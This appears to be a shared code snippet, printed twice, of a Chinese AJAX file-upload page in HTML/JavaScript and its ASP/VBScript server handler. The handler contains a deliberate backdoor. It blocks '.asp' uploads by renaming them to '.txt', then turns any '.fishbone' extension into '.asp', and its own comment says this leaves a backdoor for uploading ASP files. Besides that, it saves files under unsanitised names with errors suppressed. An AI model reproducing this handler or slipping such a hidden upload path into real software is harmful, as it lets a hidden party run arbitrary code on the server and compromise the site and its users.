html页面代码
<
meta
HTTP-EQUIV
="content-type"
CONTENT
="text/html; charset=UTF-8"
>
上传文件 < INPUT TYPE ="file" NAME ="" id ="a" >< br >
存放路径 < INPUT TYPE ="text" NAME ="" id ="b" onclick ="showpath()" > 需写上文件名 < BR >
< input type =button onclick ='upload($("a").value,$("b").value)' value =上传 >< br >
< span id ="spath" ></ span >< br >
< span id ="nowurl" ></ span >
< STYLE TYPE ="text/css" TITLE ="" >
.tfont { font-size : 12px }
</ STYLE >
< SCRIPT LANGUAGE ="JavaScript" >
<!--
function showpath(){
var path = new Ajax();
var d = function (o){
$( " spath " ).innerHTML = o.responseText;};
var w = function (){};
path.open( " http://10.84.50.220/WebService1/uploadfile.asp " , " post " ,d,w);
}
function overit(){
event.srcElement.style.cursor = " hand " ;
event.srcElement.style.background = " #EECC99 " ;
}
function outit(){
event.srcElement.style.background = " transparent " ;
}
function s(){
event.srcElement.parentNode.style.display = " none " ;
$( " b " ).focus();
$( ' b ' ).value = event.srcElement.innerHTML;
}
function upload(surl,turl){
surl = surl.replace( / / / g, " // " );
var read = new xmlhttp();
var read2 = new xmlhttp();
var xml_dom = new ActiveXObject( " MSXML2.DOMDocument " );
xml_dom.loadXML( ' <?xml version="1.0" ?> <root/> ' );
xml_dom.documentElement.setAttribute( " xmlns:dt " , " urn:schemas-microsoft-com:datatypes " );
var l_node1 = xml_dom.createElement( " file1 " );
var fname = xml_dom.createElement( " name " );
l_node1.dataType = " bin.base64 " ;
read.open( " get " ,surl, true );
read.onreadystatechange = p;
read.send( null );
function p(){
if (read.readystate == 4 )
{
fname.nodeTypedValue = turl;
l_node1.nodeTypedValue = read.responseBody;
xml_dom.documentElement.appendChild(l_node1);
xml_dom.documentElement.appendChild(fname);
read2.open( " POST " , " http://10.84.50.220/WebService1/uploadfile.asp " , true );
try {read2.setRequestHeader( " Content-Type " , " text/xml " );} catch (e){
try {read2.overrideMimeType( ' text/xml ' );} catch (e){}
}
read2.onreadystatechange = function (){
if (read2.readystate == 4 && read2.status == 200 ){
$( " nowurl " ).innerHTML = " <a href=http://www.cnjpzs.com/fishbone/ " + turl + " >now url</a> " ;
}
else {$( " nowurl " ).innerHTML = " 上传中…… " + read2.readystate;}
}
read2.send(xml_dom);
}
}
}
// xmlhttprequest对象
function xmlhttp(){
var xmlhttp = false ; // 以下写法为JS条件编译写法
/* @cc_on
@if (@_jscript_version >= 5)
try {
xmlhttp = new ActiveXObject("Msxml2.XMLHTTP")
}
catch (e){
try {
xmlhttp = new ActiveXObject("Microsoft.XMLHTTP")
}
catch (e2){
xmlhttp = false
}
}
@end
@ */
if ( ! xmlhttp && typeof XMLHttpRequest != ' undefined ' )
{xmlhttp = new XMLHttpRequest()}
return xmlhttp;
}
/* Ajax核心,兼容IE以及FF的XMLHttpRequest对象 */
function Ajax(){
var xmlhttp = false ,isComplete = false ; // 以下写法为JS条件编译写法
/* @cc_on
@if (@_jscript_version >= 5)
try {
xmlhttp = new ActiveXObject("Msxml2.XMLHTTP")
}
catch (e){
try {
xmlhttp = new ActiveXObject("Microsoft.XMLHTTP")
}
catch (e2){
xmlhttp = false
}
}
@end
@ */
if ( ! xmlhttp && typeof XMLHttpRequest != ' undefined ' )
{xmlhttp = new XMLHttpRequest()}
this .open = function (url, method, feedback,process, arg)
{
if ( ! xmlhttp) return false ;
isComplete = false ;
method = method.toUpperCase();
try {
if (method == " GET " )
{
xmlhttp.open(method, url + " ? " + arg, true );
arg = null ;
}
else
{
xmlhttp.open(method, url, true );
xmlhttp.setRequestHeader( " Method " , " POST " + url + " HTTP/1.1 " );
xmlhttp.setRequestHeader( " Content-Type " , " application/x-www-form-urlencoded " );
xmlhttp.setRequestHeader( " Connection " , " close " );
}
xmlhttp.onreadystatechange = function (){
if (xmlhttp.readyState == 4 && ! isComplete)
{
isComplete = true ;
if (xmlhttp.status == 200 ){
feedback(xmlhttp);}
else {feedback(xmlhttp.status)}
}
else
{process(xmlhttp.readyState);}
};
xmlhttp.send(arg);
}
catch (z) { return false ; }
return true ;
};
return this ;
};
// =================
// -->
</ SCRIPT >
上传文件 < INPUT TYPE ="file" NAME ="" id ="a" >< br >
存放路径 < INPUT TYPE ="text" NAME ="" id ="b" onclick ="showpath()" > 需写上文件名 < BR >
< input type =button onclick ='upload($("a").value,$("b").value)' value =上传 >< br >
< span id ="spath" ></ span >< br >
< span id ="nowurl" ></ span >
< STYLE TYPE ="text/css" TITLE ="" >
.tfont { font-size : 12px }
</ STYLE >
< SCRIPT LANGUAGE ="JavaScript" >
<!--
function showpath(){
var path = new Ajax();
var d = function (o){
$( " spath " ).innerHTML = o.responseText;};
var w = function (){};
path.open( " http://10.84.50.220/WebService1/uploadfile.asp " , " post " ,d,w);
}
function overit(){
event.srcElement.style.cursor = " hand " ;
event.srcElement.style.background = " #EECC99 " ;
}
function outit(){
event.srcElement.style.background = " transparent " ;
}
function s(){
event.srcElement.parentNode.style.display = " none " ;
$( " b " ).focus();
$( ' b ' ).value = event.srcElement.innerHTML;
}
function upload(surl,turl){
surl = surl.replace( / / / g, " // " );
var read = new xmlhttp();
var read2 = new xmlhttp();
var xml_dom = new ActiveXObject( " MSXML2.DOMDocument " );
xml_dom.loadXML( ' <?xml version="1.0" ?> <root/> ' );
xml_dom.documentElement.setAttribute( " xmlns:dt " , " urn:schemas-microsoft-com:datatypes " );
var l_node1 = xml_dom.createElement( " file1 " );
var fname = xml_dom.createElement( " name " );
l_node1.dataType = " bin.base64 " ;
read.open( " get " ,surl, true );
read.onreadystatechange = p;
read.send( null );
function p(){
if (read.readystate == 4 )
{
fname.nodeTypedValue = turl;
l_node1.nodeTypedValue = read.responseBody;
xml_dom.documentElement.appendChild(l_node1);
xml_dom.documentElement.appendChild(fname);
read2.open( " POST " , " http://10.84.50.220/WebService1/uploadfile.asp " , true );
try {read2.setRequestHeader( " Content-Type " , " text/xml " );} catch (e){
try {read2.overrideMimeType( ' text/xml ' );} catch (e){}
}
read2.onreadystatechange = function (){
if (read2.readystate == 4 && read2.status == 200 ){
$( " nowurl " ).innerHTML = " <a href=http://www.cnjpzs.com/fishbone/ " + turl + " >now url</a> " ;
}
else {$( " nowurl " ).innerHTML = " 上传中…… " + read2.readystate;}
}
read2.send(xml_dom);
}
}
}
// xmlhttprequest对象
function xmlhttp(){
var xmlhttp = false ; // 以下写法为JS条件编译写法
/* @cc_on
@if (@_jscript_version >= 5)
try {
xmlhttp = new ActiveXObject("Msxml2.XMLHTTP")
}
catch (e){
try {
xmlhttp = new ActiveXObject("Microsoft.XMLHTTP")
}
catch (e2){
xmlhttp = false
}
}
@end
@ */
if ( ! xmlhttp && typeof XMLHttpRequest != ' undefined ' )
{xmlhttp = new XMLHttpRequest()}
return xmlhttp;
}
/* Ajax核心,兼容IE以及FF的XMLHttpRequest对象 */
function Ajax(){
var xmlhttp = false ,isComplete = false ; // 以下写法为JS条件编译写法
/* @cc_on
@if (@_jscript_version >= 5)
try {
xmlhttp = new ActiveXObject("Msxml2.XMLHTTP")
}
catch (e){
try {
xmlhttp = new ActiveXObject("Microsoft.XMLHTTP")
}
catch (e2){
xmlhttp = false
}
}
@end
@ */
if ( ! xmlhttp && typeof XMLHttpRequest != ' undefined ' )
{xmlhttp = new XMLHttpRequest()}
this .open = function (url, method, feedback,process, arg)
{
if ( ! xmlhttp) return false ;
isComplete = false ;
method = method.toUpperCase();
try {
if (method == " GET " )
{
xmlhttp.open(method, url + " ? " + arg, true );
arg = null ;
}
else
{
xmlhttp.open(method, url, true );
xmlhttp.setRequestHeader( " Method " , " POST " + url + " HTTP/1.1 " );
xmlhttp.setRequestHeader( " Content-Type " , " application/x-www-form-urlencoded " );
xmlhttp.setRequestHeader( " Connection " , " close " );
}
xmlhttp.onreadystatechange = function (){
if (xmlhttp.readyState == 4 && ! isComplete)
{
isComplete = true ;
if (xmlhttp.status == 200 ){
feedback(xmlhttp);}
else {feedback(xmlhttp.status)}
}
else
{process(xmlhttp.readyState);}
};
xmlhttp.send(arg);
}
catch (z) { return false ; }
return true ;
};
return this ;
};
// =================
// -->
</ SCRIPT >
对应的服务器上传文件:
<
%@ language
=
vbscript codepage
=
65001
%
>
< %
dim ado_stream
dim xml_dom
dim xml_file1
Dim str
On Error Resume next
set ado_stream = Server.CreateObject( " ADODB.Stream " )
Set xml_dom = Server.CreateObject( " Microsoft.XMLDOM " )
xml_dom.load(request)
set xml_file1 = xml_dom.selectSingleNode( " root/file1 " )
Set xml_name = xml_dom.selectSingleNode( " root/name " )
Set reg = new RegExp
reg.pattern = " .asp "
str = xml_name.nodeTypedValue
str = Replace (str, " .asp " , " .txt " ) ' 将上传的asp文件重命名,防止别人上传asp文件
str = Replace (str, " .fishbone " , " .asp " ) ' 如果name的后缀名为fishbone,则更名成asp文件,给自己上传asp文件留后门
ado_stream.Type = 1
ado_stream.open
ado_stream.write xml_file1.nodeTypedValue
ado_stream.SaveToFile server.mappath( " . " ) & " " & str, 2 ' 2=adSaveCreateOverWrite
ado_stream.close
set ado_stream = Nothing
set xml_dom = Nothing
If Err.number <> 0 Then response.write Err.description
Response.Write " Upload successful! "
% >
< %
dim ado_stream
dim xml_dom
dim xml_file1
Dim str
On Error Resume next
set ado_stream = Server.CreateObject( " ADODB.Stream " )
Set xml_dom = Server.CreateObject( " Microsoft.XMLDOM " )
xml_dom.load(request)
set xml_file1 = xml_dom.selectSingleNode( " root/file1 " )
Set xml_name = xml_dom.selectSingleNode( " root/name " )
Set reg = new RegExp
reg.pattern = " .asp "
str = xml_name.nodeTypedValue
str = Replace (str, " .asp " , " .txt " ) ' 将上传的asp文件重命名,防止别人上传asp文件
str = Replace (str, " .fishbone " , " .asp " ) ' 如果name的后缀名为fishbone,则更名成asp文件,给自己上传asp文件留后门
ado_stream.Type = 1
ado_stream.open
ado_stream.write xml_file1.nodeTypedValue
ado_stream.SaveToFile server.mappath( " . " ) & " " & str, 2 ' 2=adSaveCreateOverWrite
ado_stream.close
set ado_stream = Nothing
set xml_dom = Nothing
If Err.number <> 0 Then response.write Err.description
Response.Write " Upload successful! "
% >